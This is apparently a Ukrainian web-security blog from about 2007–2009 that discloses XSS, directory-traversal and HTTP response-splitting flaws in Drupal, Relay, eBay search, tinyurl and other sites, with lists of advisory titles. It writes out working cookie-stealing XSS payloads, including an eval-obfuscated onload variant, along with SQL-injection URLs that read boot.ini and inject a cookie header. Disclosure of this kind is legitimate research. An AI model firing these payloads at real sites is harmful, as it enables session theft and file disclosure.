Websecurity - Веб безпека

Нещодавно я писав про XSS уразливість в Drupal. Минулого року, 14.03.2008, я знайшов нову Cross-Site Scripting уразливість в Drupal. Про що найближчим часом сповіщу розробників системи.

Дану уразливість я виявив на сайті ko.itc.ua. На якому я знайшов XSS дірку 17.08.2007 (в пошуці по сайту). А потім коли я зайшов на сайт в 2008 році, виявилося, що вони змінили движок, але знову ж таки мають XSS в пошуці по сайту .

XSS:

http://site/search/node/%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Уразливі Drupal 5.5 та попередні версії (і можливо деякі наступні версії).

P.S.

Як я додатково перевірив на різних сайтах, версії Drupal 5.7, 5.15, 6.8 і 6.9 не вразливі.

20.08.2008

У грудні, 03.12.2007, а також додатково сьогодні, я знайшов Cross-Site Scripting уразливості на проекті http://www.yarmap.com.ua. Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

20.02.2009

XSS:

• alert(document.cookie) (виправили)
• alert(document.cookie) (виправили)
• html включення

Якщо першу уразливість виправили повністью, то в другій виправили лише XSS, але не html включення. До того ж уразливість виправили погано - виправили лише атаку через GET, тому можлива атака через POST.

XSS:

POST запит на сторінці http://www.yarmap.com.ua
"><script>alert(document.cookie)</script>В полі Що шукаємо.

XSS через GET:

• alert(document.cookie)
• цікавий

Учора я писав про XSS уразливість в Drupal. Сьогодні я зробив дослідження сайтів на движку Drupal, щоб виявити інші сайти з даною уразливістю. І я виявив чимало сайтів на старих версіях Drupal, в тому числі тих, що мають цю дірку.

Зокрема сьогодні я виявив наступні сайти з Cross-Site Scripting уразливістю: http://applefritter.com, http://tomorrow.sg і http://systbio.org (які використовують даний движок).

XSS:

POST запит на сторінці http://applefritter.com/user/password, на сторінці http://tomorrow.sg/user/password і на сторінці http://systbio.org/?q=user/password:
<BODY onload="a='alert';b='(document.cookie)';eval(a+b);"В полях: Username та E-mail address.

В даній добірці уразливості в веб додатках:

• Philips VOIP841 Multiple Vulnerabilities (деталі)
• artmedic weblog multiple local file inclusion vulnerabilities (деталі)
• Astrosoft HelpDesk Multiple XSS (деталі)
• JSPWiki Multiple Vulnerabilities (деталі)
• joomla “com_omnirealestate” S@L Injection (деталі)
• Vulnerability in joomla “com_model” (деталі)
• joomla upload php code or picture (com_uhp) (деталі)
• all forums.asp hack (деталі)
• ALL VERSION PHPAUTOVIDEO c99 shell (деталі)
• Pre-auth remote commands execution in SAP MaxDB 7.6.03.07 (деталі)

Ще 12.11.2007 я знайшов Cross-Site Scripting уразливість в Drupal. Про що найближчим часом сповіщу розробників системи.

Дану уразливість я виявив на сайті http://it.ridne.net, який зокрема публікує новини на тему інформаційної безпеки. Як я виявив в 2008 році, коли дішла черга до публікації даної дірки на it.ridne.net, вони вже виправили її (явно шляхом апгрейда движка, навіть не підозрюючи, що на сайті є уразливість).

XSS:

POST запит на сторінці http://site/user/password
<BODY onload="a='alert';b='(document.cookie)';eval(a+b);"В полях: Username та E-mail address.

Уразливі Drupal 4.5.2 та попередні версії (і можливо деякі наступні версії). В останніх версіях уразливість вже виправлена.

30.11.2007

У листопаді, 30.11.2007, я знайшов Cross-Site Scripting уразливості на проекті http://tinyurl.com. Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливості з’явиться пізніше.

18.02.2009

XSS:

• alert(’XSS’)
• alert(document.cookie)

XSS (Mozilla / Firefox / Opera / Chrome):

• alert(’XSS’)
• alert(document.cookie)

Код спрацьовує при кліку на лінці “Proceed to this site”. Це strictly social XSS: в першому випадку це persistent підтип даного типу XSS, а в другому - persistent self-contained підтип.

XSS (IE):

• alert(document.cookie)
• цікавий

Дані уразливості досі не виправлені.

Минулого року я вже писав про уразливості в Relay. Учора, 16.02.2009, я виявив дві нові уразливості в Relay - Directory Traversal та HTTP Response Splitting. Обидві уразливості пов’язані з однією SQL Injection в Relay, про яку я писав торік. Дані дві атаки проводяться через SQL ін’єкцію.

Якщо HTTP Response Splitting через SQL Injection я раніше вже зустрічав, то Directory Traversal через SQL Injection я виявив вперше (саме в Relay). Ідею подібної атаки мені підкинув Alex на прикладі дірки на http://referat.com.ua.

Подібні атаки відрізняються від считування файлів засобами СУБД (як LOAD_FILE в MySQL) в тому, що вони не залежать від прав користувача на роботу з файловою системою. І тому дані атаки можуть застосовуватися для обходу обмеження на роботу з файловою системою в СУБД.

Directory Traversal (через SQL Injection):

http://site/relay/relay.php?relay=getFile&fileid=-1%20union%20select%201,char(98,111,111,116,46,105,110,105),char(99,58),char(47,102,105,108,101,115,116,111,114,101),1,1,1,1,1,1,1,1,1,1

Для отримання файла boot.ini. На інших ОС можна отримати інші файли.

HTTP Response Splitting (через SQL Injection):

http://site/relay/relay.php?relay=getFile&fileid=-1%20union%20select%201,1,1,char(47,102,105,108,101,115,116,111,114,101),char(10,83,101,116,45,67,111,111,107,105,101,58,32,110,97,109,101,61,118,97,108,117,101,59,32,112,97,116,104,61,47,59),1,1,1,1,1,1,1,1,1

Для встановлення кукіса.

Вразлива версія Relay beta 1.0 (та попередні версії). Про уразливості розробникам веб додатка я повідомлю найближчим часом.

В даній добірці уразливості в веб додатках:

• Serendipity Freetag-plugin XSS vulnerability (деталі)
• Cacti 0.8.7a Multiple Vulnerabilities (деталі)
• LI-countdown SQL Injection Vulnerability (деталі)
• cacti — Multiple security vulnerabilities have been discovered (деталі)
• artmedic weblog multiple xss vulnerabilities (деталі)
• PostgreSQL 2007-01-07 Cumulative Security Release (деталі)
• PlutoStatus Locator v1.0pre (alpha) local file inclusion vulnerability (деталі)
• scribe 0.2 local file inclusion vulnerability (деталі)
• StatCounteX 3.0 & 3.1 Admin Vulnerability (деталі)
• Joomla 1.0.13 - 1.0.14 / (remote) PHP file inclusion possible if old configuration.php (деталі)

14.08.2008

У листопаді, 26.11.2007, я знайшов Cross-Site Scripting уразливість на проекті http://ebay.com, в даному випадку в пошуці по сайту (http://search.ebay.com). Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливість з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

16.02.2009

XSS:

• alert(document.cookie)

Дана уразливість вже виправлена.

Зазначу, що в пошуку на eBay наявне конвертування запиту, що призводить до шифрування пошукового запиту в урлі й відповідно XSS в урлі.

Звичайний XSS код:
http://search.ebay.com/search/search.dll?from=';alert(document.cookie);//&satitle=1

Стає зашифрованим XSS кодом:
http://search.ebay.com/1_W0QQfromZQ27Q3balertQ28documentQ2ecookieQ29Q3bQ2fQ2f

Даний тип Сross-Site Scripting я назвав Зашифрований XSS (Encrypted XSS). Це перший приклад подібної XSS.

В даній добірці уразливості в веб додатках:

• Joovili <= v.2.1 (members_help.php) Remote File Include Vulnerability (деталі)
• Blackboard (id) Remote SQL Injection (деталі)
• Husrev Forums v2.0.1:PoWerBoard (tr) (id) Remote SQL Injection (деталі)
• Multiple LFI in PowerNews (Newsscript) 2.5.6 (деталі)
• Re: Certificate spoofing issue with Mozilla, Konqueror, Safari 2 (деталі)
• Sertificate spoofing with subjectAltName and domain name wildcards (деталі)
• Certificate spoofing issue with Mozilla, Konqueror, Safari 2 (деталі)
• Provided By Development Solutions SQL Injection Exploit (panel) (деталі)
• Netkom Internet Solutions (folder_id) Remote SQL Injection Vulnerability (деталі)
• Vwar New Bug (деталі)